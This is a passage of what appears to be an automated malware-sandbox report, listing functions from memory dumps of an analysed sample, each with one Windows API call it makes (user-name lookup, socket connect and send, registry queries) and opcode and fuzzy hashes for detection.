Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5a307650ba88745c6300685a032d674fcd7283707f358f5105b873ef0d143b88
Instruction ID: 1682703d4da45b5a7358bce7661781ad3dba298a9a06a39636c317b9506604d5
Opcode Fuzzy Hash: 5a307650ba88745c6300685a032d674fcd7283707f358f5105b873ef0d143b88
Instruction Fuzzy Hash: CB11B175600310AFEB31DE15DC44FA7FBE8EF04710F44845AED499A242D664F408CA71

Uniqueness

Uniqueness Score: -1.00%

Function 05422FDA, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05423039

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 67f4605abfc80462ce2c0a3c80c0e91a9b37d6a0e39e5f65600c19ecd0c94a78
Instruction ID: f8fe918001268635e9432735d99dc7a63b3225622c3571220514c4991a837e7c
Opcode Fuzzy Hash: 67f4605abfc80462ce2c0a3c80c0e91a9b37d6a0e39e5f65600c19ecd0c94a78
Instruction Fuzzy Hash: 09119072500300AFEB21CF59DC85FAAFBA8EF44720F0488AAED458B655D675E405CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078B6D2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078B72E

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: ed4df473633d8f0e4fb8af18924e82f017a1ba7b92c9dec960fb34165e990cde
Instruction ID: a9fc5be7f36acf42b1efb43179f76735fe8c6fb4993f588791e298c468832410
Opcode Fuzzy Hash: ed4df473633d8f0e4fb8af18924e82f017a1ba7b92c9dec960fb34165e990cde
Instruction Fuzzy Hash: F111C471540300AFEB21DF69DC85B66FBA8EF44320F14846BED458B255D778E404CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05420C0C, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 05420C73

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: b6e24bc9c536e62556b91e55acec85e4317f6ab763582a5a6e16048529077da9
Instruction ID: 0dcfdcbb624cb320e766352beb17929704acd57239cd8e8f14c7ffbd754aa765
Opcode Fuzzy Hash: b6e24bc9c536e62556b91e55acec85e4317f6ab763582a5a6e16048529077da9
Instruction Fuzzy Hash: AA1160715093809FD715CF25DC88B92BFE8EF45210F0984AEED49CB252D234E844CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05423626, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542368A

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 2546b24a8ac5d1cded09532f6da79b7ba734191cd9f77798c235574428412078
Instruction ID: db000346af14c0da3869ec25f6ad9b75a57f49ead7ee1528abd62bc27b4c7296
Opcode Fuzzy Hash: 2546b24a8ac5d1cded09532f6da79b7ba734191cd9f77798c235574428412078
Instruction Fuzzy Hash: 3D118EB1504304AEE721CF55DC84FA6BBACEF04720F04886BE9459B245D678E4088AB1

Uniqueness

Uniqueness Score: -1.00%

Function 054243EE, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542444A

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 1f462d3a26546b406a6c0133971ac719d1e841038c5a285919007eb9408bf88e
Instruction ID: f70d128f4abed2822daab7a89d5451ffeb00d71640793d6a8af3f7e6776e59a3
Opcode Fuzzy Hash: 1f462d3a26546b406a6c0133971ac719d1e841038c5a285919007eb9408bf88e
Instruction Fuzzy Hash: 4C11B271600310AFEB21DF65DC85FA6FBA8EF44720F08846BED458B245E674E404CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078A86A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0078A8DC

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0c3d0e4917bdd55ab258672622b477eb575f1248c7fb75bdc34352c5a68689f7
Instruction ID: 5a889f7913e5eb2634900461544166f327d0693686f021d174214ef612eb8fff
Opcode Fuzzy Hash: 0c3d0e4917bdd55ab258672622b477eb575f1248c7fb75bdc34352c5a68689f7
Instruction Fuzzy Hash: 3221387140D3C4AFD7138B259C94662BFB4AF57624F0980DBED848F1A3D2696908D772

Uniqueness

Uniqueness Score: -1.00%

Function 0078B2D6, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0078B32C

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: cc64dfa65a87a34e6f195dac37eb7fce9ca998e76f32ce3fcb056c478c77dd6b
Instruction ID: 23b3b811f55e283d89f6e2a09b532fd8d6525982feaa63a9f2ccf504b3d05dec
Opcode Fuzzy Hash: cc64dfa65a87a34e6f195dac37eb7fce9ca998e76f32ce3fcb056c478c77dd6b
Instruction Fuzzy Hash: 61110671600300AFEB21DF19DC85B6ABB98EF04320F14846AED44CF645D778E804CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0078A7BF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0078A82A

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d3dc870e194b8ce18311b54e491c66d8c81c5982f012a9972369aea0dcf2f303
Instruction ID: c9d9c43dd85fd3f9cfd1132778a2f655a7483049497012f8cb9425ac406d3860
Opcode Fuzzy Hash: d3dc870e194b8ce18311b54e491c66d8c81c5982f012a9972369aea0dcf2f303
Instruction Fuzzy Hash: 2811A271409380AFDB228F55DC44B62FFF4EF46310F08859EED858B152C235A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0078BAEE, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E80,?,?), ref: 0078BB66

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: b8426c7f42127665ec7fc3d59fe61871161a7821b8743fe773439ad2af457109
Instruction ID: 57bf45c3bb87a4c5251ce5af3c0bab47dd82933b96608ce00189382d9b4a18b2
Opcode Fuzzy Hash: b8426c7f42127665ec7fc3d59fe61871161a7821b8743fe773439ad2af457109
Instruction Fuzzy Hash: CC11C4715097806FC321DB15CC85F62FFB4EF86620F09819EED884B692D225B919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 054221FE, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542225D

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 0b3470e3d137e4dc3cb031bc9c8240f7946d8c3154af5631ce0822796afa0f4f
Instruction ID: 83caca6b5e0f09f3daf49dd0278c867f10296d07c9d60819daecafbeb3403662
Opcode Fuzzy Hash: 0b3470e3d137e4dc3cb031bc9c8240f7946d8c3154af5631ce0822796afa0f4f
Instruction Fuzzy Hash: 5D11BF71504310AFEB21CF55DC84FA6FBA8EF44320F0488AAED459B645D275E409CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 054244D6, Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05424532

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: e8c15c608d3184b44c99f20eab43921416d30811f9c839082d059cf30de838bc
Instruction ID: 67be4388bfb816b1e3c8c209c3d80306dae2e901483fea9039481709e14f0a76
Opcode Fuzzy Hash: e8c15c608d3184b44c99f20eab43921416d30811f9c839082d059cf30de838bc
Instruction Fuzzy Hash: 0E119471500314AFEB21DF55DC44FA6FBA8EF44720F0884ABED859B645D674E444CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05423442, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 0542349B

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: d51216c434533a0f451247bd1a10150ed811828b149e95d2f58dc15c2b16a9b3
Instruction ID: 6656018b4dacb0beb230a76cb9d02a6b4f6feac5b091a52cf904d5b7f253909d
Opcode Fuzzy Hash: d51216c434533a0f451247bd1a10150ed811828b149e95d2f58dc15c2b16a9b3
Instruction Fuzzy Hash: B9119171500354AFEB22CF55DC84FAABBA8EF44720F1488AAED449B645D678A405CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05422F0A, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05422F60

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: f1711370da53efbb928acddda44971415c980a83f5f5239bb9fe49e32c3c590f
Instruction ID: be5a082438c1875e6a6e859131e42c7c83337c7131baa94b451abe666fc68f62
Opcode Fuzzy Hash: f1711370da53efbb928acddda44971415c980a83f5f5239bb9fe49e32c3c590f
Instruction Fuzzy Hash: 2E11C275508314AFEB21CF15DC84BA6BBA8EF44320F4484ABED489F249D678E405CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0078BE1E, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,00000E80), ref: 0078BE87

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f068b2a5586377491781a71474d4b66547ff5008403421d7fa5af19dee53e72c
Instruction ID: 14959d1844803296c1b6ce6fb0fa4d758b7a89cbc976a082dc9cd06712538a30
Opcode Fuzzy Hash: f068b2a5586377491781a71474d4b66547ff5008403421d7fa5af19dee53e72c
Instruction Fuzzy Hash: 5A11E571540300AFE730DF15DC85FA6FBA8EF04720F14845AEE445A285D3B9A908CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05421D60, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?), ref: 05421DB4

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 981760f278529a1c308946d64f71c1d6e2a4f8ca8c69eb6a444182d9bcb2e37d
Instruction ID: 1f047adf7f74ab2ca111fb63074fea72fb538ff23c32ce56c15fdd5d15cbb218
Opcode Fuzzy Hash: 981760f278529a1c308946d64f71c1d6e2a4f8ca8c69eb6a444182d9bcb2e37d
Instruction Fuzzy Hash: B711C6715093809FD7128F25DC84B92BFB4EF42220F0884EFED85CF652D275A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0542370A, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 05423769

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: d8d8e029113212d85ed3c60eb22af43f56931b6ba813ac75a64bc39e149d027e
Instruction ID: e011301070b52af52566ce151e217ba22ab105c58433599b0de54c60de4db651
Opcode Fuzzy Hash: d8d8e029113212d85ed3c60eb22af43f56931b6ba813ac75a64bc39e149d027e
Instruction Fuzzy Hash: 9011ECB1500300AFEB218F15CC84FA6FBA8EF44320F08C99AED455A256D278E409CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0078B960, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0078B9BD

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 2d1445af49c1615fe781ba067d4a23fd4cf5c4195b1a90d99fc561e86706b884
Instruction ID: 1838ab9ab70e2f91d631b3815a24d91795981aadb5644622c7ecb05cb0f5b126
Opcode Fuzzy Hash: 2d1445af49c1615fe781ba067d4a23fd4cf5c4195b1a90d99fc561e86706b884
Instruction Fuzzy Hash: 6C119171409380AFDB22CF55DC84B52FFB4EF55224F08859EED848F252D375A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0078A3DB, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?), ref: 0078A43C

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 427bfda936e715bbd2bd2d09c852d2d0934312899d0be57bb95e6440d3a5068a
Instruction ID: aff4ea17dcc8771a2a8baf619a81d1b3e6ebfcd7a28376786f0105d486f808c4
Opcode Fuzzy Hash: 427bfda936e715bbd2bd2d09c852d2d0934312899d0be57bb95e6440d3a5068a
Instruction Fuzzy Hash: 221182714493C4AFDB128F15DC85752BFB4EF46214F0884DBED898F253D279A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0078AD9E, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0078ADE6

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0dbf36422d79068f388ce57b13c26da7e30022dd1eeb65b7331930bacdac9ae6
Instruction ID: 55f2db73366f3937bdc394cb4476de96329e41cb108dff2b6cc52a62ff4a027c
Opcode Fuzzy Hash: 0dbf36422d79068f388ce57b13c26da7e30022dd1eeb65b7331930bacdac9ae6
Instruction Fuzzy Hash: E11152716403409FE760DF5AD885756FBD8EF14321F08846AED49CB645D678E804CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0542237E, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 054223D4

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 54f713b447d146e8cd6e3fa2490920a31140f4badd103f7f6e75fcbf12f8aae3
Instruction ID: 629af5e5efb5c4822766b8fecf324699002d37ac8e5645470287b576239e9f1a
Opcode Fuzzy Hash: 54f713b447d146e8cd6e3fa2490920a31140f4badd103f7f6e75fcbf12f8aae3
Instruction Fuzzy Hash: B9010475504314AEEB21DF15CC84FA6FBA8EF04320F44809AED449B246D2B4E509CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 0542206E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E80,7792E0B7,00000000,00000000,00000000,00000000), ref: 054220C1

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 166ff0ad6ce006a96c853a7c2f49a4d92b59726aff986d69a41294be6f625c01
Instruction ID: 738c6d615bd3427b8f8211f76613ed5a1b57aef896ffefdbf6ccd81f1952c9a3
Opcode Fuzzy Hash: 166ff0ad6ce006a96c853a7c2f49a4d92b59726aff986d69a41294be6f625c01
Instruction Fuzzy Hash: 2001D275504314AFE721CF15DC85FA6FBA8EF44720F48C09AEE459B246D6B8E448CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 05420C2E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?), ref: 05420C73

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: c2c8bf44ab3ef91fb9bed933c4f307bb3942d024996f2f46dcafe4311280371b
Instruction ID: 7048eb01e73184777565660ac210e8f168488202677897fb86f1838f6f09002d
Opcode Fuzzy Hash: c2c8bf44ab3ef91fb9bed933c4f307bb3942d024996f2f46dcafe4311280371b
Instruction Fuzzy Hash: 6B1152B56043508FD764CF1AD988BA6BBE8EF44220F4884AADD4DCB745E674E404CB61

Uniqueness

Uniqueness Score: -1.00%

Function 054237DE, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 0542382A

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 7570908f0bd502b0dc3056f28b78d3a8c62c5e15d97b1b8ea72324ea621bac6c
Instruction ID: 7241c108a59324b58eb380574039c61f9a9ffdc1c1d7360629833ac78cdb256a
Opcode Fuzzy Hash: 7570908f0bd502b0dc3056f28b78d3a8c62c5e15d97b1b8ea72324ea621bac6c
Instruction Fuzzy Hash: 3F114C315047109FDB20CF55D884BA2FBF5FF04210F0889AADD898FA15D375E418CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05421282, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 054212CA

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 33fbc73283d389f4369664fadb1c82c32562fe2a2e8a305f9b5623f2fc9c9e90
Instruction ID: b64eb41b09e6b2b46b7f49f3160040b269f9e6a929b4cb400d0d9b21e916b513
Opcode Fuzzy Hash: 33fbc73283d389f4369664fadb1c82c32562fe2a2e8a305f9b5623f2fc9c9e90
Instruction Fuzzy Hash: B00161756042508FD764CE1AD884BA6FBE8FF04620F48C0AAED45DB755D675E408CF72

Uniqueness

Uniqueness Score: -1.00%

Function 0078B3E2, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E80,?,?), ref: 0078B432

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 06dea1911733352f37ea2d01914043e21f87f08e23e2ca03ca73644ad4e65927
Instruction ID: 36c96723cbd297de870ebaac2dbc295512824a75547f524d59848b6f0385c947
Opcode Fuzzy Hash: 06dea1911733352f37ea2d01914043e21f87f08e23e2ca03ca73644ad4e65927
Instruction Fuzzy Hash: 4801B171500600ABD310DF1ADC85B26FBA8FB89B20F14812AED088B641E231F916CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0078B8DA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E80,?,?), ref: 0078B92A

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 3aa8c86d6d7e0944b8a53644408f45493089f227a5b2e8825fb2ebe2a32ac662
Instruction ID: 94ecb1ac150b6be6e100f57596b4516bff04e0e78cc9561009189912abbc1904
Opcode Fuzzy Hash: 3aa8c86d6d7e0944b8a53644408f45493089f227a5b2e8825fb2ebe2a32ac662
Instruction Fuzzy Hash: CD01B171500600ABD310DF1ADC85B26FBA8FB89B20F14812AED088B641E231F916CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0078A4D2, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E80,?,?), ref: 0078A522

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: c4048e02ba3600a75c21f2a8b9d3ddaacfaf6ce66b116c017d70c68e17fcff70
Instruction ID: 3ce922b48660db39b59d855a3263a0bb869644102b02a66a3fe63d3643e82d40
Opcode Fuzzy Hash: c4048e02ba3600a75c21f2a8b9d3ddaacfaf6ce66b116c017d70c68e17fcff70
Instruction Fuzzy Hash: C601B171500600ABD710DF1ADC85B26FBA8FB89A20F14816AED088B641E231F916CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0542158E, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 054215D9

Memory Dump Source

Source File: 00000002.00000002.735617809.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5420000_3NeufRwoxF.jbxd

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: e9abf62a119cf0413439f7f88a69053275c6ef6be98f591ad7b0d77bca08603e
Instruction ID: eabd83154ccc9d20118a34393decd1555d108ffbc30c090bcb33ec76f19e5880
Opcode Fuzzy Hash: e9abf62a119cf0413439f7f88a69053275c6ef6be98f591ad7b0d77bca08603e
Instruction Fuzzy Hash: AC0169716042508FDB60CE1AD884B62FBE4FF04620F4880AEDD4A8B756E375E448CA72

Uniqueness

Uniqueness Score: -1.00%

Function 0078A7E6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0078A82A

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 84e251ca7fcdc8cb009970a50b0504bfc1ae2fcfea31ccc5b6174940f00d5d5e
Instruction ID: cffe93e33c419c1622e0a78ebe11cca161c724442c318f85c9abf386514ce6bb
Opcode Fuzzy Hash: 84e251ca7fcdc8cb009970a50b0504bfc1ae2fcfea31ccc5b6174940f00d5d5e
Instruction Fuzzy Hash: FF015E31500700AFEB219F55D884B52FBE0EF08320F08856ADD894A655D379E415DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078ACF2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0078AD24

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_78a000_3NeufRwoxF.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 931712835e07251f8cc13fdf170ee6adde169bcc2f1d7d97620ae731c139b5aa
Instruction ID: 57b6c3b438dfc1df02b9d55e4cb72798045677f16d5e8329c375a889f58ee1cc
Opcode Fuzzy Hash: 931712835e07251f8cc13fdf170ee6adde169bcc2f1d7d97620ae731c139b5aa
Instruction Fuzzy Hash: F90171756443409FEB609F19D884765FB94EF00321F18C4ABDD49CFA5AD679E404CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0078B636, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 0078B686

Memory Dump Source

Source File: 00000002.00000002.734027746.000000000078A000.00000040.00000001.sdmp, Offset: 0078A000, based on PE: false

Joe Sandbox IDA Plugin

